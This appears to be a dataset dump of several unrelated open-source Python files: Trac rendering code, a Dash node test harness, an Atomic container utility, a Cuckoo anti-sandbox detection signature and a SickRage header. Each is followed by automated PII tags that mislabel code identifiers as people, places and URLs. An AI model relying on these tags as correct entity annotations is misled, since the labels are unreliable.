"""
return to_utf8(content, self.get_charset(content, mimetype))
def to_unicode(self, content, mimetype=None, charset=None):
"""Convert `content` (an encoded `str` object) to an `unicode` object.
This calls `trac.util.to_unicode` with the `charset` provided,
or the one obtained by `Mimeview.get_charset()`.
"""
if not charset:
charset = self.get_charset(content, mimetype)
return to_unicode(content, charset)
def configured_modes_mapping(self, renderer):
"""Return a MIME type to `(mode,quality)` mapping for given `option`"""
types, option = {}, '%s_modes' % renderer
for mapping in self.config['mimeviewer'].getlist(option):
if not mapping:
continue
try:
mimetype, mode, quality = mapping.split(':')
types[mimetype] = (mode, int(quality))
except (TypeError, ValueError):
self.log.warning("Invalid mapping '%s' specified in '%s' "
"option.", mapping, option)
return types
def preview_data(self, context, content, length, mimetype, filename,
url=None, annotations=None, force_source=False):
"""Prepares a rendered preview of the given `content`.
Note: `content` will usually be an object with a `read` method.
"""
data = {'raw_href': url, 'size': length,
'max_file_size': self.max_preview_size,
'max_file_size_reached': False,
'rendered': None,
}
if length >= self.max_preview_size:
data['max_file_size_reached'] = True
else:
result = self.render(context, mimetype, content, filename, url,
annotations, force_source=force_source)
data['rendered'] = result
return data
def send_converted(self, req, in_type, content, selector, filename='file'):
"""Helper method for converting `content` and sending it directly.
`selector` can be either a key or a MIME Type."""
from trac.web.api import RequestDone
content, output_type, ext = self.convert_content(req, in_type,
content, selector)
if isinstance(content, unicode):
content = content.encode('utf-8')
req.send_response(200)
req.send_header('Content-Type', output_type)
req.send_header('Content-Length', len(content))
if filename:
req.send_header('Content-Disposition',
content_disposition(filename='%s.%s' %
(filename, ext)))
req.end_headers()
req.write(content)
raise RequestDone
def _group_lines(stream):
space_re = re.compile('(?P<spaces> (?: +))|^(?P<tag><\w+.*?>)?( )')
def pad_spaces(match):
m = match.group('spaces')
if m:
div, mod = divmod(len(m), 2)
return div * u'\xa0 ' + mod * u'\xa0'
return (match.group('tag') or '') + u'\xa0'
def _generate():
stack = []
def _reverse():
for event in reversed(stack):
if event[0] is START:
yield END, event[1][0], event[2]
else:
yield END_NS, event[1][0], event[2]
for kind, data, pos in stream:
if kind is TEXT:
lines = data.split('\n')
if lines:
# First element
for e in stack:
yield e
yield kind, lines.pop(0), pos
for e in _reverse():
yield e
# Subsequent ones, prefix with \n
for line in lines:
yield TEXT, '\n', pos
for e in stack:
yield e
yield kind, line, pos
for e in _reverse():
yield e
else:
if kind is START or kind is START_NS:
stack.append((kind, data, pos))
elif kind is END or kind is END_NS:
stack.pop()
else:
yield kind, data, pos
buf = []
# Fix the \n at EOF.
if not isinstance(stream, list):
stream = list(stream)
found_text = False
for i in range(len(stream)-1, -1, -1):
if stream[i][0] is TEXT:
e = stream[i]
# One chance to strip a \n
if not found_text and e[1].endswith('\n'):
stream[i] = (e[0], e[1][:-1], e[2])
if len(e[1]):
found_text = True
break
if not found_text:
raise StopIteration
for kind, data, pos in _generate():
if kind is TEXT and data == '\n':
yield Stream(buf[:])
del buf[:]
else:
if kind is TEXT:
data = space_re.sub(pad_spaces, data)
buf.append((kind, data, pos))
if buf:
yield Stream(buf[:])
# -- Default annotators
class LineNumberAnnotator(Component):
"""Text annotator that adds a column with line numbers."""
implements(IHTMLPreviewAnnotator)
# ITextAnnotator methods
def get_annotation_type(self):
return 'lineno', _('Line'), _('Line numbers')
def get_annotation_data(self, context):
return None
def annotate_row(self, context, row, lineno, line, data):
row.append(tag.th(id='L%s' % lineno)(
tag.a(lineno, href='#L%s' % lineno)
))
# -- Default renderers
class PlainTextRenderer(Component):
"""HTML preview renderer for plain text, and fallback for any kind of text
for which no more specific renderer is available.
"""
implements(IHTMLPreviewRenderer)
expand_tabs = True
returns_source = True
def get_quality_ratio(self, mimetype):
if mimetype in Mimeview(self.env).treat_as_binary:
return 0
return 1
def render(self, context, mimetype, content, filename=None, url=None):
if is_binary(content):
self.log.debug("Binary data; no preview available")
return
self.log.debug("Using default plain text mimeviewer")
return content_to_unicode(self.env, content, mimetype)
class ImageRenderer(Component):
"""Inline image display.
This component doesn't need the `content` at all.
"""
implements(IHTMLPreviewRenderer)
def get_quality_ratio(self, mimetype):
if mimetype.startswith('image/'):
return 8
return 0
def render(self, context, mimetype, content, filename=None, url=None):
if url:
return tag.div(tag.img(src=url, alt=filename),
class_='image-file')
class WikiTextRenderer(Component):
"""HTML renderer for files containing Trac's own Wiki formatting markup."""
implements(IHTMLPreviewRenderer)
def get_quality_ratio(self, mimetype):
if mimetype in ('text/x-trac-wiki', 'application/x-trac-wiki'):
return 8
return 0
def render(self, context, mimetype, content, filename=None, url=None):
from trac.wiki.formatter import format_to_html
return format_to_html(self.env, context,
content_to_unicode(self.env, content, mimetype))
| 43,065 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2004-2010'], ['DATE_TIME', '2004'], ['PERSON', 'Daniel Lundin'], ['DATE_TIME', '2005-2006'], ['PERSON', 'Christopher Lenz'], ['DATE_TIME', '2006-2007'], ['NRP', 'Christian'], ['PERSON', 'Daniel Lundin'], ['PERSON', 'Christopher Lenz'], ['PERSON', 'Markup'], ['PERSON', 'Href'], ['LOCATION', 'self.resource'], ['PERSON', '1).resource'], ['PERSON', 'oneliner'], ['NRP', 'self._hints'], ['PERSON', 'msword'], ['PERSON', "roff troff'"], ['PERSON', "ini cfg'"], ['PERSON', 'vba'], ['PERSON', 'ada asm asp'], ['PERSON', 'ksh lua'], ['PERSON', 'tcl tex zsh'], ['PERSON', 'mimetype'], ['PERSON', 'Mark'], ['LOCATION', 'convert_content(req'], ['LOCATION', 'mimetype'], ['PERSON', 'dylan'], ['PERSON', 'msword'], ['NRP', 'input_mimettype'], ['LOCATION', 'mimetype'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['LOCATION', "self.log.debug('Trying"], ['NRP', 'force_source'], ['LOCATION', 'basestring'], ['PERSON', "context.get_hint('disable_warnings"], ['PERSON', 'atitle = annotator.get_annotation_type'], ['LOCATION', 'tag_("Can\'t'], ['PERSON', 'mimetype'], ['PERSON', 'mimetype'], ['NRP', 'force_source'], ['URL', 'self.ma'], ['PERSON', 'lineno'], ['URL', 'self.log.de'], ['URL', 'tag.im'], ['URL', 'trac.wiki.fo'], ['URL', 'http://trac.edgewall.org/wiki/TracLicense.'], ['URL', 'http://trac.edgewall.org/log/.'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', 'e:: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'genshi.co'], ['URL', 'genshi.in'], ['URL', 'trac.co'], ['URL', 'trac.co'], ['URL', 'trac.re'], ['URL', 'trac.util.tr'], ['URL', 'self.pa'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'trac.web.ch'], ['URL', 'context.resource.re'], ['URL', 'context.re'], ['URL', 'context.pa'], ['URL', 'context.ch'], ['URL', 'context.ch'], ['URL', 'context.ch'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'context.pa'], ['URL', 'context.re'], ['URL', 'self.re'], ['URL', 'context.re'], ['URL', 'context.resource.re'], ['URL', 'resource.re'], ['URL', 'context.resource.id'], ['URL', 'resource.id'], ['URL', 'context.pa'], ['URL', 'ctx.se'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'hints.ge'], ['URL', 'ctx.se'], ['URL', 'self.pa'], ['URL', 'p.pa'], ['URL', 'TYPES.ke'], ['URL', 't.st'], ['URL', 'TYPES.se'], ['URL', 'TYPES.it'], ['URL', 're.com'], ['URL', 're.VE'], ['URL', 'mimetypes.gu'], ['URL', 're.se'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'content.re'], ['URL', 'mimeview.ma'], ['URL', 'mimeview.to'], ['URL', 'self.in'], ['URL', 'self.ma'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.input.re'], ['URL', 'self.ma'], ['URL', 'self.content.re'], ['URL', 'self.co'], ['URL', 'self.content.se'], ['URL', 'IContentConverter.ge'], ['URL', 'self.co'], ['URL', 'converter.ge'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'converter.co'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'IHTMLPreviewRenderer.re'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'renderer.ge'], ['URL', 'candidates.so'], ['URL', 'self.ma'], ['URL', 'content.re'], ['URL', 'self.log.de'], ['URL', 'renderer.re'], ['URL', 'result.ge'], ['URL', 'context.req.args.ge'], ['URL', 'context.re'], ['URL', 'tag.pr'], ['URL', 'context.re'], ['URL', 'context.ge'], ['URL', 'trac.web.ch'], ['URL', 'context.re'], ['URL', 'trac.web.ch'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'annotator.ge'], ['URL', 'e.me'], ['URL', 'context.re'], ['URL', 'tag.st'], ['URL', 'tag.pr'], ['URL', 'e.me'], ['URL', 'tag.tr'], ['URL', 'tag.th'], ['URL', 'tag.th'], ['URL', 'tag.tr'], ['URL', 'annotator.an'], ['URL', 'tag.td'], ['URL', 'tag.td'], ['URL', 'tag.th'], ['URL', 'self.ma'], ['URL', 'mimetype.fi'], ['URL', 'self.de'], ['URL', 'MAP.co'], ['URL', 'self.co'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'self.ge'], ['URL', 'trac.util.to'], ['URL', 'Mimeview.ge'], ['URL', 'self.ge'], ['URL', 'self.co'], ['URL', 'self.ma'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.su'], ['URL', 'tag.th'], ['URL', 'self.log.de'], ['URL', 'mimetype.st']] |
8 | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for dashd node under test"""
import decimal
import errno
import http.client
import json
import logging
import os
import subprocess
import time
from .authproxy import JSONRPCException
from .mininode import NodeConn
from .util import (
assert_equal,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class TestNode():
"""A class for representing a dashd node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir):
self.index = i
self.datadir = os.path.join(dirname, "node" + str(i))
self.rpchost = rpchost
if timewait:
self.rpc_timeout = timewait
else:
# Wait for up to 60 seconds for the RPC server to respond
self.rpc_timeout = 60
if binary is None:
self.binary = os.getenv("BITCOIND", "dashd")
else:
self.binary = binary
self.stderr = stderr
self.coverage_dir = coverage_dir
# Most callers will just need to add extra args to the standard list below. For those callers that need more flexibity, they can just set the args property directly.
self.extra_args = extra_args
self.args = [self.binary, "-datadir=" + self.datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-logtimemicros", "-debug", "-debugexclude=libevent", "-debugexclude=leveldb", "-mocktime=" + str(mocktime), "-uacomment=testnode%d" % i]
self.cli = TestNodeCLI(os.getenv("BITCOINCLI", "dash-cli"), self.datadir)
# Don't try auto backups (they fail a lot when running tests)
self.args.append("-createwalletbackups=0")
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.p2ps = []
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection."""
assert self.rpc_connected and self.rpc is not None, "Error: no RPC connection"
return getattr(self.rpc, name)
def start(self, extra_args=None, stderr=None):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
if stderr is None:
stderr = self.stderr
self.process = subprocess.Popen(self.args + extra_args, stderr=stderr)
self.running = True
self.log.debug("dashd started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the dashd process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
assert self.process.poll() is None, "dashd exited with status %i during initialization" % self.process.returncode
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
self.rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
# -28 RPC in warmup
# -342 Service unavailable, RPC server started but is shutting down due to error
if e.error['code'] != -28 and e.error['code'] != -342:
raise # unknown JSON RPC exception
except ValueError as e: # cookie file not found and no rpcuser or rpcassword. dashd still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
raise AssertionError("Unable to connect to dashd")
def get_wallet_rpc(self, wallet_name):
assert self.rpc_connected
assert self.rpc
wallet_path = "wallet/%s" % wallet_name
return self.rpc / wallet_path
def stop_node(self, wait=0):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop(wait=wait)
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert_equal(return_code, 0)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes dashd to shutdown, so this method takes
care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
self.p2ps.append(p2p_conn)
kwargs.update({'rpc': self.rpc, 'callback': p2p_conn})
p2p_conn.add_connection(NodeConn(**kwargs))
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, "No p2p connection"
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
# Connection could have already been closed by other end.
if p.connection is not None:
p.connection.disconnect_node()
self.p2ps = []
class TestNodeCLI():
"""Interface to bitcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.args = []
self.binary = binary
self.datadir = datadir
self.input = None
def __call__(self, *args, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line args
self.args = [str(arg) for arg in args]
self.input = input
return self
def __getattr__(self, command):
def dispatcher(*args, **kwargs):
return self.send_cli(command, *args, **kwargs)
return dispatcher
def send_cli(self, command, *args, **kwargs):
"""Run bitcoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same bitcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.args
if named_args:
p_args += ["-named"]
p_args += [command] + pos_args + named_args
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
return json.loads(cli_stdout, parse_float=decimal.Decimal)
| 9,148 | [['DATE_TIME', '2017'], ['DATE_TIME', '.authproxy'], ['LOCATION', 'JSONRPCException'], ['PERSON', 'dirname'], ['PERSON', 'extra_args'], ['LOCATION', 'rpchost'], ['DATE_TIME', 'up to 60 seconds'], ['URL', 'logging.ge'], ['URL', 'TestFramework.no'], ['PERSON', 'extra_args'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.log.de'], ['LOCATION', 'JSONRPCException'], ['LOCATION', 'http.client'], ['LOCATION', 'p2p_conn'], ['PERSON', "kwargs['dstport"], ['LOCATION', 'self.p2ps.append(p2p_conn'], ['PERSON', 'returncode ='], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'http.cl'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.bi'], ['URL', 'os.ge'], ['URL', 'self.bi'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.cl'], ['URL', 'os.ge'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.st'], ['URL', 'self.pro'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.pro'], ['URL', 'self.process.re'], ['URL', 'self.co'], ['URL', 'self.rpc.ge'], ['URL', 'e.er'], ['URL', 'errno.EC'], ['URL', 'e.er'], ['URL', 'e.er'], ['URL', 'time.sl'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.st'], ['URL', 'http.client.Ca'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.log.de'], ['URL', 'self.is'], ['URL', 'self.in'], ['URL', 'conn.ad'], ['URL', 'p.co'], ['URL', 'p.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'kwargs.it'], ['URL', 'self.bi'], ['URL', 'self.ar'], ['URL', 'process.com'], ['URL', 'self.in'], ['URL', 'subprocess.Ca'], ['URL', 'self.bi'], ['URL', 'decimal.De']] |
9 | # !/usr/bin/python
# Copyright (C) 2015 Red Hat, All rights reserved.
# AUTHORS: Alex Collins dummy@email.com
import sys
import json
import subprocess
import collections
from fnmatch import fnmatch as matches
from docker.utils import kwargs_from_env
import docker
import selinux
"""Atomic Utility Module"""
ReturnTuple = collections.namedtuple('ReturnTuple',
['return_code', 'stdout', 'stderr'])
if sys.version_info[0] < 3:
input = raw_input
else:
input = input
def _decompose(compound_name):
""" '[reg/]repo[:tag]' -> (reg, repo, tag) """
reg, repo, tag = '', compound_name, ''
if '/' in repo:
reg, repo = repo.split('/', 1)
if ':' in repo:
repo, tag = repo.rsplit(':', 1)
return reg, repo, tag
def image_by_name(img_name, images=None):
"""
Returns a list of image data for images which match img_name. Will
optionally take a list of images from a docker.Client.images
query to avoid multiple docker queries.
"""
i_reg, i_rep, i_tag = _decompose(img_name)
# Correct for bash-style matching expressions.
if not i_reg:
i_reg = '*'
if not i_tag:
i_tag = '*'
# If the images were not passed in, go get them.
if images is None:
c = docker.Client(**kwargs_from_env())
images = c.images(all=False)
valid_images = []
for i in images:
for t in i['RepoTags']:
reg, rep, tag = _decompose(t)
if matches(reg, i_reg) \
and matches(rep, i_rep) \
and matches(tag, i_tag):
valid_images.append(i)
break
# Some repo after decompose end up with the img_name
# at the end. i.e. rhel7/rsyslog
if rep.endswith(img_name):
valid_images.append(i)
break
return valid_images
def subp(cmd):
"""
Run a command as a subprocess.
Return a triple of return code, standard out, standard err.
"""
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
return ReturnTuple(proc.returncode, stdout=out, stderr=err)
def default_container_context():
if selinux.is_selinux_enabled() != 0:
fd = open(selinux.selinux_lxc_contexts_path())
for i in fd.readlines():
name, context = i.split("=")
if name.strip() == "file":
return context.strip("\n\" ")
return ""
def writeOut(output, lf="\n"):
sys.stdout.flush()
sys.stdout.write(str(output) + lf)
def output_json(json_data):
''' Pretty print json data '''
writeOut(json.dumps(json_data, indent=4, separators=(',', ': ')))
def print_scan_summary(json_data, names=None):
'''
Print a summary of the data returned from a
CVE scan.
'''
max_col_width = 50
min_width = 15
def _max_width(data):
max_name = 0
for name in data:
max_name = len(data[name]) if len(data[name]) > max_name \
else max_name
# If the max name length is less that max_width
if max_name < min_width:
max_name = min_width
# If the man name is greater than the max col leng
# we wish to use
if max_name > max_col_width:
max_name = max_col_width
return max_name
clean = True
if len(names) > 0:
max_width = _max_width(names)
else:
max_width = min_width
template = "{0:" + str(max_width) + "} {1:5} {2:5} {3:5} {4:5}"
sevs = ['critical', 'important', 'moderate', 'low']
writeOut(template.format("Container/Image", "Cri", "Imp", "Med", "Low"))
writeOut(template.format("-" * max_width, "---", "---", "---", "---"))
res_summary = json_data['results_summary']
for image in res_summary.keys():
image_res = res_summary[image]
if 'msg' in image_res.keys():
tmp_tuple = (image_res['msg'], "", "", "", "")
else:
if len(names) < 1:
image_name = image[:max_width]
else:
image_name = names[image][-max_width:]
if len(image_name) == max_col_width:
image_name = '...' + image_name[-(len(image_name) - 3):]
tmp_tuple = tuple([image_name] +
[str(image_res[sev]) for sev in sevs])
sev_results = [image_res[sev] for sev in
sevs if image_res[sev] > 0]
if len(sev_results) > 0:
clean = False
writeOut(template.format(*tmp_tuple))
writeOut("")
return clean
def print_detail_scan_summary(json_data, names=None):
'''
Print a detailed summary of the data returned from
a CVE scan.
'''
clean = True
sevs = ['Critical', 'Important', 'Moderate', 'Low']
cve_summary = json_data['host_results']
image_template = " {0:10}: {1}"
cve_template = " {0:10}: {1}"
for image in cve_summary.keys():
image_res = cve_summary[image]
writeOut("")
writeOut(image[:12])
if not image_res['isRHEL']:
writeOut(image_template.format("Result",
"Not based on Red Hat"
"Enterprise Linux"))
continue
else:
writeOut(image_template.format("OS", image_res['os'].rstrip()))
scan_results = image_res['cve_summary']['scan_results']
for sev in sevs:
if sev in scan_results:
clean = False
writeOut(image_template.format(sev,
str(scan_results[sev]['num'])))
for cve in scan_results[sev]['cves']:
writeOut(cve_template.format("CVE", cve['cve_title']))
writeOut(cve_template.format("CVE URL",
cve['cve_ref_url']))
writeOut(cve_template.format("RHSA ID",
cve['rhsa_ref_id']))
writeOut(cve_template.format("RHSA URL",
cve['rhsa_ref_url']))
writeOut("")
return clean
def get_mounts_by_path():
'''
Gets all mounted devices and paths
:return: dict of mounted devices and related information by path
'''
mount_info = []
f = open('/proc/mounts', 'r')
for line in f:
_tmp = line.split(" ")
mount_info.append({'path': _tmp[1],
'device': _tmp[0],
'type': _tmp[2],
'options': _tmp[3]
}
)
return mount_info
def is_dock_obj_mounted(docker_obj):
'''
Check if the provided docker object, which needs to be an ID,
is currently mounted and should be considered "busy"
:param docker_obj: str, must be in ID format
:return: bool True or False
'''
mount_info = get_mounts_by_path()
devices = [x['device'] for x in mount_info]
# If we can find the ID of the object in the list
# of devices which comes from mount, safe to assume
# it is busy.
return any(docker_obj in x for x in devices)
def urllib3_disable_warnings():
if 'requests' not in sys.modules:
import requests
else:
requests = sys.modules['requests']
# On latest Fedora, this is a symlink
if hasattr(requests, 'packages'):
requests.packages.urllib3.disable_warnings() # pylint: disable=maybe-no-member
else:
# But with python-requests-2.4.3-1.el7.noarch, we need
# to talk to urllib3 directly
have_urllib3 = False
try:
if 'urllib3' not in sys.modules:
import urllib3
have_urllib3 = True
except ImportError:
pass
if have_urllib3:
# Except only call disable-warnings if it exists
if hasattr(urllib3, 'disable_warnings'):
urllib3.disable_warnings()
| 8,241 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alex Collins'], ['LOCATION', 'name.strip'], ['PERSON', 'json'], ['PERSON', 'separators='], ['PERSON', 'max'], ['PERSON', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['URL', 'template.fo'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'requests.pa'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'email.com'], ['URL', 'collections.na'], ['URL', 'sys.ve'], ['URL', 'repo.rs'], ['URL', 'docker.Client.im'], ['URL', 'docker.Cl'], ['URL', 'c.im'], ['URL', 'proc.com'], ['URL', 'proc.re'], ['URL', 'selinux.is'], ['URL', 'selinux.se'], ['URL', 'fd.re'], ['URL', 'name.st'], ['URL', 'context.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'res.ke'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'sys.mo'], ['URL', 'python-requests-2.4.3-1.el7.no']] |
10 | # Copyright (C) 2014 Claudio "nex" Guarnieri (@botherder), Accuvant, Inc. (dummy@email.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class Unhook(Signature):
name = "antisandbox_unhook"
description = "Tries to unhook or modify Windows functions monitored by Cuckoo"
severity = 3
confidence = 60
categories = ["anti-sandbox"]
authors = ["nex","Accuvant"]
minimum = "1.2"
evented = True
filter_categories = set(["__notification__"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.saw_unhook = False
self.unhook_info = set()
def on_call(self, call, process):
subcategory = self.check_argument_call(call,
api="__anomaly__",
name="Subcategory",
pattern="unhook")
if subcategory:
self.saw_unhook = True
funcname = self.get_argument(call, "FunctionName")
if funcname != "":
if (funcname != "SetUnhandledExceptionFilter" and funcname != "SetWindowsHookExW" and funcname != "UnhookWindowsHookEx" and
funcname != "CoCreateInstance") or self.get_argument(call, "UnhookType") != "modification":
self.unhook_info.add("function_name: " + funcname + ", type: " + self.get_argument(call, "UnhookType"))
def on_complete(self):
if len(self.unhook_info) > 5:
weight = len(self.unhook_info)
confidence = 100
if not self.unhook_info:
self.saw_unhook = False
for info in self.unhook_info:
self.data.append({"unhook" : info })
return self.saw_unhook
| 2,422 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Claudio'], ['PERSON', 'Guarnieri'], ['PERSON', 'api="__anomaly'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'lib.cuckoo.com'], ['URL', 'self.sa'], ['URL', 'self.ch'], ['URL', 'self.sa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'info.ad'], ['URL', 'self.ge'], ['URL', 'self.sa'], ['URL', 'self.sa']] |
11 | # coding=utf-8
# Author: Dennis Lutter dummy@email.com
# Author: Jonathon Saine dummy@email.com
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
# TODO: break this up into separate files
# pylint: disable=C0301,C0302
# pylint: disable=E1101,E0202,C0111,C0103
import io
import os
import re
import time
import urllib
import datetime
import traceback
import sickbeard
from sickrage.helper.common import dateFormat, dateTimeFormat, pretty_file_size, sanitize_filename, timeFormat
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException
from sickrage.helper.quality import get_quality_string
from sickrage.media.ShowFanArt import ShowFanArt
from sickrage.media.ShowNetworkLogo import ShowNetworkLogo
from sickrage.media.ShowPoster import ShowPoster
from sickrage.media.ShowBanner import ShowBanner
from sickrage.show.ComingEpisodes import ComingEpisodes
from sickrage.show.History import History
from sickrage.show.Show import Show
from sickrage.system.Restart import Restart
from sickrage.system.Shutdown import Shutdown
from sickbeard.versionChecker import CheckVersion
